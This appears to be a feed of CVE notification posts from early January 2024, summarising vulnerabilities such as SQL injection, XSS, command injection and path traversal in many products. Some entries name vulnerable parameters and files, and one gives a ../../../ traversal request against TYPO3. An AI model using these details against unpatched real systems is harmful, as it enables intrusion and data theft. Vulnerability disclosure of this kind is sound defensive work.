🚨 CVE-2023-50297Open redirect vulnerability in PowerCMS (6 Series, 5 Series, and 4 Series) allows a remote unauthenticated attacker to redirect users to arbitrary web sites via a specially crafted URL. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability.🎖@cveNotify |
|
| 2024-01-04 15:37:37 |
🚨 CVE-2024-21625SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (`sidequest://`) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly.🎖@cveNotify |
|
| 2024-01-04 15:37:36 |
🚨 CVE-2023-50866Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'username' parameter of the loginAction.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-04 15:37:31 |
🚨 CVE-2023-50863Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'hotelIDHidden' parameter of the generateReceipt.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-04 15:37:30 |
🚨 CVE-2023-50760Online Notice Board System v1.0 is vulnerable to an Insecure File Upload vulnerability on the 'f' parameter of user/update_profile_pic.php page, allowing an authenticated attacker to obtain Remote Code Execution on the server hosting the application.🎖@cveNotify |
|
| 2024-01-04 15:37:26 |
🚨 CVE-2023-6094A vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. The vulnerability results from lack of protection for sensitive information during transmission. An attacker eavesdropping on the traffic between the web browser and server may obtain sensitive information. This type of attack could be executed to gather sensitive information or to facilitate a subsequent attack against the target.🎖@cveNotify |
|
| 2024-01-04 15:37:25 |
🚨 CVE-2023-28616An issue was discovered in Stormshield Network Security (SNS) before 4.3.17, 4.4.x through 4.6.x before 4.6.4, and 4.7.x before 4.7.1. It affects user accounts for which the password has an equals sign or space character. The serverd process logs such passwords in cleartext, and potentially sends these logs to the Syslog component.🎖@cveNotify |
|
| 2024-01-04 15:37:24 |
🚨 CVE-2022-2389The Abandoned Cart Recovery for WooCommerce, Follow Up Emails, Newsletter Builder & Marketing Automation By Autonami WordPress plugin before 2.1.2 does not have authorisation and CSRF checks in one of its AJAX action, allowing any authenticated users, such as subscriber to create automations🎖@cveNotify |
|
| 2024-01-04 15:07:45 |
🚨 CVE-2023-6944A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.🎖@cveNotify |
|
| 2024-01-04 15:07:44 |
🚨 CVE-2022-2081A vulnerability exists in the HCI Modbus TCP function included in the product versions listed above. If the HCI Modbus TCP is enabled and configured, an attacker could exploit the vulnerability by sending a specially crafted message to the RTU500 in a high rate, causing the targeted RTU500 CMU to reboot. The vulnerability is caused by a lack of flood control which eventually if exploited causes an internal stack overflow in the HCI Modbus TCP function.🎖@cveNotify |
|
| 2024-01-04 15:07:43 |
🚨 CVE-2023-50082Aoyun Technology pbootcms V3.1.2 is vulnerable to Incorrect Access Control, allows remote attackers to gain sensitive information via session leakage allows a user to avoid logging into the backend management platform.🎖@cveNotify |
|
| 2024-01-04 15:07:39 |
🚨 CVE-2023-41784Permissions and Access Control Vulnerability in ZTE Red Magic 8 Pro🎖@cveNotify |
|
| 2024-01-04 15:07:38 |
🚨 CVE-2023-52322ecrire/public/assembler.php in SPIP before 4.1.3 and 4.2.x before 4.2.7 allows XSS because input from _request() is not restricted to safe characters such as alphanumerics.🎖@cveNotify |
|
| 2024-01-04 14:37:38 |
🚨 CVE-2023-49665Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'quantity[]' parameter of the submit_delivery_list.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-04 14:37:31 |
🚨 CVE-2023-49633Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'buyer_address' parameter of the buyer_detail_submit.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-04 14:37:30 |
🚨 CVE-2023-49624Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'cancelid' parameter of the material_bill.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-04 14:37:26 |
🚨 CVE-2023-40058Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment.🎖@cveNotify |
|
| 2024-01-04 14:37:25 |
🚨 CVE-2023-3742Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-04 14:07:25 |
🚨 CVE-2023-5594Improper validation of the server’s certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted.🎖@cveNotify |
|
| 2024-01-04 12:37:27 |
🚨 CVE-2023-6992Cloudflare version of zlib library was found to be vulnerable to memory corruption issues affecting the deflation algorithm implementation (deflate.c). The issues resulted from improper input validation and heap-based buffer overflow.A local attacker could exploit the problem during compression using a crafted malicious file potentially leading to denial of service of the software.Patches: The issue has been patched in commit 8352d10 https://github.com/cloudflare/zlib/commit/8352d108c05db1bdc5ac3bdf834dad641694c13c . The upstream repository is not affected.🎖@cveNotify |
|
| 2024-01-04 12:37:26 |
🚨 CVE-2021-40367A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing DICOM files. This could result in an out-of-bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-15097)🎖@cveNotify |
|
| 2024-01-04 10:37:26 |
🚨 CVE-2023-6944A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.🎖@cveNotify |
|
| 2024-01-04 10:37:25 |
🚨 CVE-2022-2081A vulnerability exists in the HCI Modbus TCP function included in the product versions listed above. If the HCI Modbus TCP is enabled and configured, an attacker could exploit the vulnerability by sending a specially crafted message to the RTU500 in a high rate, causing the targeted RTU500 CMU to reboot. The vulnerability is caused by a lack of flood control which eventually if exploited causes an internal stack overflow in the HCI Modbus TCP function.🎖@cveNotify |
|
| 2024-01-04 09:37:24 |
🚨 CVE-2023-51467The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code🎖@cveNotify |
|
| 2024-01-04 08:37:25 |
🚨 CVE-2023-50082Aoyun Technology pbootcms V3.1.2 is vulnerable to Incorrect Access Control, allows remote attackers to gain sensitive information via session leakage allows a user to avoid logging into the backend management platform.🎖@cveNotify |
|
| 2024-01-04 08:37:24 |
🚨 CVE-2023-41784Permissions and Access Control Vulnerability in ZTE Red Magic 8 Pro🎖@cveNotify |
|
| 2024-01-04 06:37:25 |
🚨 CVE-2023-29962S-CMS v5.0 was discovered to contain an arbitrary file read vulnerability.🎖@cveNotify |
|
| 2024-01-04 04:37:25 |
🚨 CVE-2023-6733The WP-Members Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.8 via the wpmem_field shortcode. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including user emails, password hashes, usernames, and more.🎖@cveNotify |
|
| 2024-01-04 04:37:24 |
🚨 CVE-2023-6498The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 6.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-01-04 04:07:30 |
🚨 CVE-2023-52096SteVe Community ocpp-jaxb before 0.0.8 generates invalid timestamps such as ones with month 00 in certain situations (such as when an application receives a StartTransaction Open Charge Point Protocol message with a timestamp parameter of 1000000). This may lead to a SQL exception in applications, and may undermine the integrity of transaction records.🎖@cveNotify |
|
| 2024-01-04 03:37:25 |
🚨 CVE-2023-52086resumable.php (aka PHP backend for resumable.js) 0.1.4 before 3c6dbf5 allows arbitrary file upload anywhere in the filesystem via ../ in multipart/form-data content to upload.php. (File overwrite hasn't been possible with the code available in GitHub in recent years, however.)🎖@cveNotify |
|
| 2024-01-04 03:37:24 |
🚨 CVE-2023-27043The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.🎖@cveNotify |
|
| 2024-01-04 03:07:32 |
🚨 CVE-2023-51467The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)🎖@cveNotify |
|
| 2024-01-04 03:07:25 |
🚨 CVE-2023-46681Improper neutralization of argument delimiters in a command ('Argument Injection') vulnerability in VR-S1000 firmware Ver. 2.37 and earlier allows an authenticated attacker who can access to the product's command line interface to execute an arbitrary command.🎖@cveNotify |
|
| 2024-01-04 03:07:24 |
🚨 CVE-2023-49117PowerCMS (6 Series, 5 Series, and 4 Series) contains a stored cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user's web browser. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability.🎖@cveNotify |
|
| 2024-01-04 01:37:32 |
🚨 CVE-2023-5880When the Genie Company Aladdin Connect garage door opener (Retrofit-Kit Model ALDCM) is placed into configuration mode the web servers “Garage Door Control Module Setup” page is vulnerable to XSS via a broadcast SSID name containing malicious code with client side Java Script and/or HTML. This allows the attacker to inject malicious code with client side Java Script and/or HTML into the users' web browser.🎖@cveNotify |
|
| 2024-01-04 01:37:25 |
🚨 CVE-2023-47247In SysAid On-Premise before 23.3.34, there is an edge case in which an end user is able to delete a Knowledge Base article, aka bug 15102.🎖@cveNotify |
|
| 2024-01-04 01:37:24 |
🚨 CVE-2023-47091An issue was discovered in Stormshield Network Security (SNS) SNS 4.3.13 through 4.3.22 before 4.3.23, SNS 4.6.0 through 4.6.9 before 4.6.10, and SNS 4.7.0 through 4.7.1 before 4.7.2. An attacker can overflow the cookie threshold, making an IPsec connection impossible.🎖@cveNotify |
|
| 2024-01-04 00:37:24 |
🚨 CVE-2012-5639LibreOffice and OpenOffice automatically open embedded content🎖@cveNotify |
|
| 2024-01-03 23:37:25 |
🚨 CVE-2023-50256Froxlor is open source server administration software. Prior to version 2.1.2, it was possible to submit the registration form with the essential fields, such as the username and password, left intentionally blank. This inadvertent omission allowed for a bypass of the mandatory field requirements (e.g. surname, company name) established by the system. Version 2.1.2 fixes this issue.🎖@cveNotify |
|
| 2024-01-03 23:37:24 |
🚨 CVE-2022-34268An issue was discovered in RWS WorldServer before 11.7.3. /clientLogin deserializes Java objects without authentication, leading to command execution on the host.🎖@cveNotify |
|
| 2024-01-03 23:07:26 |
🚨 CVE-2023-36486The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user by uploading a workflow definition file with a malicious filename.🎖@cveNotify |
|
| 2024-01-03 23:07:25 |
🚨 CVE-2023-36485The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user via a malicious BPMN2 workflow definition file.🎖@cveNotify |
|
| 2024-01-03 21:37:26 |
🚨 CVE-2023-6540A vulnerability was reported in the Lenovo Browser Mobile and Lenovo Browser HD Apps for Android that could allow an attacker to craft a payload that could result in the disclosure of sensitive information.🎖@cveNotify |
|
| 2024-01-03 21:37:25 |
🚨 CVE-2023-51363VR-S1000 firmware Ver. 2.37 and earlier allows a network-adjacent unauthenticated attacker who can access the product's web management page to obtain sensitive information.🎖@cveNotify |
|
| 2024-01-03 21:07:38 |
🚨 CVE-2022-39822In NOKIA NFM-T R19.9, a SQL Injection vulnerability occurs in /cgi-bin/R19.9/easy1350.pl of the VM Manager WebUI via the id or host HTTP GET parameter. An authenticated attacker is required for exploitation.🎖@cveNotify |
|
| 2024-01-03 21:07:31 |
🚨 CVE-2023-30451In TYPO3 11.5.24, the filelist component allows attackers (who have access to the administrator panel) to read arbitrary files via directory traversal in the baseuri field, as demonstrated by POST /typo3/record/edit with ../../../ in data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].🎖@cveNotify |
|
| 2024-01-03 21:07:30 |
🚨 CVE-2023-49880In the Message Entry and Repair (MER) facility of IBM Financial Transaction Manager for SWIFT Services 3.2.4 the sending address and the message type of FIN messages are assumed to be immutable. However, an attacker might modify these elements of a business transaction. IBM X-Force ID: 273183.🎖@cveNotify |
|
| 2024-01-03 21:07:26 |
🚨 CVE-2023-51763csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection.🎖@cveNotify |
|
| 2024-01-03 21:07:25 |
🚨 CVE-2023-51451Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator's API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`.🎖@cveNotify |
|
| 2024-01-03 20:37:32 |
🚨 CVE-2023-7095A vulnerability, which was classified as critical, has been found in Totolink A7100RU 7.4cu.2313_B20191024. Affected by this issue is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248942 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-03 20:37:25 |
🚨 CVE-2023-50254Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue.🎖@cveNotify |
|
| 2024-01-03 20:07:26 |
🚨 CVE-2023-5962A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization.🎖@cveNotify |
|
| 2024-01-03 20:07:25 |
🚨 CVE-2023-50259Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.🎖@cveNotify |
|
| 2024-01-03 20:07:24 |
🚨 CVE-2023-51385In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.🎖@cveNotify |
|
| 2024-01-03 19:37:25 |
🚨 CVE-2023-46929An issue discovered in GPAC 2.3-DEV-rev605-gfc9e29089-master in MP4Box in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 allows attackers to crash the application.🎖@cveNotify |
|
| 2024-01-03 19:37:24 |
🚨 CVE-2023-51662The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5.🎖@cveNotify |
|
| 2024-01-03 19:07:25 |
🚨 CVE-2021-45967An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints.🎖@cveNotify |
|
| 2024-01-03 19:07:24 |
🚨 CVE-2019-15592GitLab 12.2.2 and below contains a security vulnerability that allows a guest user in a private project to see the merge request ID associated to an issue via the activity timeline.🎖@cveNotify |
|
| 2024-01-03 18:37:25 |
🚨 CVE-2014-125108A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-03 18:37:24 |
🚨 CVE-2023-51651AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1.🎖@cveNotify |
|
| 2024-01-03 18:07:26 |
🚨 CVE-2023-51387Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1.🎖@cveNotify |
|
| 2024-01-03 18:07:25 |
🚨 CVE-2023-42465Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit.🎖@cveNotify |
|
| 2024-01-03 17:37:32 |
🚨 CVE-2023-50093APIIDA API Gateway Manager for Broadcom Layer7 v2023.2.2 is vulnerable to Host Header Injection.🎖@cveNotify |
|
| 2024-01-03 17:37:26 |
🚨 CVE-2023-37607Directory Traversal in Automatic-Systems SOC FL9600 FastLine lego_T04E00 allows a remote attacker to obtain sensitive information.🎖@cveNotify |
|
| 2024-01-03 17:37:25 |
🚨 CVE-2023-6348Type Confusion in Spellcheck in Google Chrome prior to 119.0.6045.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-03 17:07:24 |
🚨 CVE-2023-7042A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.🎖@cveNotify |
|
| 2024-01-03 16:37:31 |
🚨 CVE-2024-21910TinyMCE versions before 5.10.0 are affected by a cross-site scripting vulnerability. A remote and unauthenticated attacker could introduce crafted image or link URLs that would result in the execution of arbitrary JavaScript in an editing user's browser.🎖@cveNotify |
|
| 2024-01-03 16:37:26 |
🚨 CVE-2024-21908TinyMCE versions before 5.9.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user's browser.🎖@cveNotify |
|
| 2024-01-03 16:37:25 |
🚨 CVE-2023-30617Kruise provides automated management of large-scale applications on Kubernetes. Starting in version 0.8.0 and prior to versions 1.3.1, 1.4.1, and 1.5.2, an attacker who has gained root privilege of the node that kruise-daemon run can leverage the kruise-daemon pod to list all secrets in the entire cluster. After that, the attacker can leverage the "captured" secrets (e.g. the kruise-manager service account token) to gain extra privileges such as pod modification. Versions 1.3.1, 1.4.1, and 1.5.2 fix this issue. A workaround is available. For users that do not require imagepulljob functions, they can modify kruise-daemon-role to drop the cluster level secret get/list privilege.🎖@cveNotify |
|
| 2024-01-03 15:37:26 |
🚨 CVE-2023-45559An issue in Tamaki_hamanoki Line v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-03 15:37:25 |
🚨 CVE-2023-40058Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment.🎖@cveNotify |
|
| 2024-01-03 15:37:24 |
🚨 CVE-2023-4911A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.🎖@cveNotify |
|
| 2024-01-03 15:07:25 |
🚨 CVE-2023-7039A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688.🎖@cveNotify |
|
| 2024-01-03 14:37:27 |
🚨 CVE-2023-50093APIIDA API Gateway Manager for Broadcom Layer7 v2023.2.2 is vulnerable to Host Header Injection.🎖@cveNotify |
|
| 2024-01-03 14:37:26 |
🚨 CVE-2023-49792Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them executing authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-01-03 14:37:25 |
🚨 CVE-2023-49791Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-01-03 14:07:26 |
🚨 CVE-2023-50711vmm-sys-util is a collection of modules that provides helpers and utilities used by multiple rust-vmm components. Starting in version 0.5.0 and prior to version 0.12.0, an issue in the `FamStructWrapper::deserialize` implementation provided by the crate for `vmm_sys_util::fam::FamStructWrapper` can lead to out of bounds memory accesses. The deserialization does not check that the length stored in the header matches the flexible array length. Mismatch in the lengths might allow out of bounds memory access through Rust-safe methods. The issue was corrected in version 0.12.0 by inserting a check that verifies the lengths of compared flexible arrays are equal for any deserialized header and aborting deserialization otherwise. Moreover, the API was changed so that header length can only be modified through Rust-unsafe code. This ensures that users cannot trigger out-of-bounds memory access from Rust-safe code.🎖@cveNotify |
|
| 2024-01-03 14:07:25 |
🚨 CVE-2023-49794KernelSU is a Kernel-based root solution for Android devices. In versions 0.7.1 and prior, the logic of get apk path in KernelSU kernel module can be bypassed, which causes any malicious apk named `me.weishu.kernelsu` get root permission. If a KernelSU module installed device try to install any not checked apk which package name equal to the official KernelSU Manager, it can take over root privileges on the device. As of time of publication, a patched version is not available.🎖@cveNotify |
|
| 2024-01-03 13:37:25 |
🚨 CVE-2023-37608An issue in Automatic Systems SOC FL9600 FastLine v.lego_T04E00 allows a remote attacker to obtain sensitive information via the admin login credentials.🎖@cveNotify |
|
| 2024-01-03 12:37:33 |
🚨 CVE-2023-4320An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.🎖@cveNotify |
|
| 2024-01-03 12:37:27 |
🚨 CVE-2023-4692An out-of-bounds write flaw was found in grub2's NTFS filesystem driver. This issue may allow an attacker to present a specially crafted NTFS filesystem image, leading to grub's heap metadata corruption. In some circumstances, the attack may also corrupt the UEFI firmware heap metadata. As a result, arbitrary code execution and secure boot protection bypass may be achieved.🎖@cveNotify |
|
| 2024-01-03 12:37:26 |
🚨 CVE-2022-43680In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.🎖@cveNotify |
|
| 2024-01-03 12:37:25 |
🚨 CVE-2012-5639LibreOffice and OpenOffice automatically open embedded content🎖@cveNotify |
|
| 2024-01-03 10:37:26 |
🚨 CVE-2024-0201The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_settings' function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings.🎖@cveNotify |
|
| 2024-01-03 10:37:25 |
🚨 CVE-2023-51784Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.5.0 through 1.9.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/9329🎖@cveNotify |
|
| 2024-01-03 09:37:44 |
🚨 CVE-2023-6621The POST SMTP WordPress plugin before 2.8.7 does not sanitise and escape the msg parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2024-01-03 09:37:43 |
🚨 CVE-2023-52312Nullptr dereference in paddle.crop in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.🎖@cveNotify |
|
| 2024-01-03 09:37:42 |
🚨 CVE-2023-52311PaddlePaddle before 2.6.0 has a command injection in _wget_download. This resulted in the ability to execute arbitrary commands on the operating system.🎖@cveNotify |
|
| 2024-01-03 09:37:39 |
🚨 CVE-2023-52310PaddlePaddle before 2.6.0 has a command injection in get_online_pass_interval. This resulted in the ability to execute arbitrary commands on the operating system.🎖@cveNotify |
|
| 2024-01-03 09:37:38 |
🚨 CVE-2023-52308FPE in paddle.amin in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.🎖@cveNotify |
|
| 2024-01-03 09:37:37 |
🚨 CVE-2023-52306FPE in paddle.lerp in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.🎖@cveNotify |
|
| 2024-01-03 09:37:33 |
🚨 CVE-2023-52304Stack overflow in paddle.searchsorted in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, or even more damage.🎖@cveNotify |
|
| 2024-01-03 09:37:32 |
🚨 CVE-2023-50921An issue was discovered on GL.iNet devices through 4.5.0. Attackers can invoke the add_user interface in the system module to gain root privileges. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.🎖@cveNotify |
|
| 2024-01-03 09:37:28 |
🚨 CVE-2023-38677FPE in paddle.linalg.eig in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.🎖@cveNotify |
|
| 2024-01-03 09:37:27 |
🚨 CVE-2023-38675FPE in paddle.linalg.matrix_rank in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.🎖@cveNotify |
|
| 2024-01-03 09:37:26 |
🚨 CVE-2023-38674FPE in paddle.nanmedian in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service.🎖@cveNotify |
|
| 2024-01-03 08:37:32 |
🚨 CVE-2024-0210Zigbee TLV dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2024-01-03 08:37:25 |
🚨 CVE-2023-50922An issue was discovered on GL.iNet devices through 4.5.0. Attackers who are able to steal the AdminToken cookie can execute arbitrary code by uploading a crontab-formatted file to a specific directory and waiting for its execution. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.🎖@cveNotify |
|
| 2024-01-03 08:37:24 |
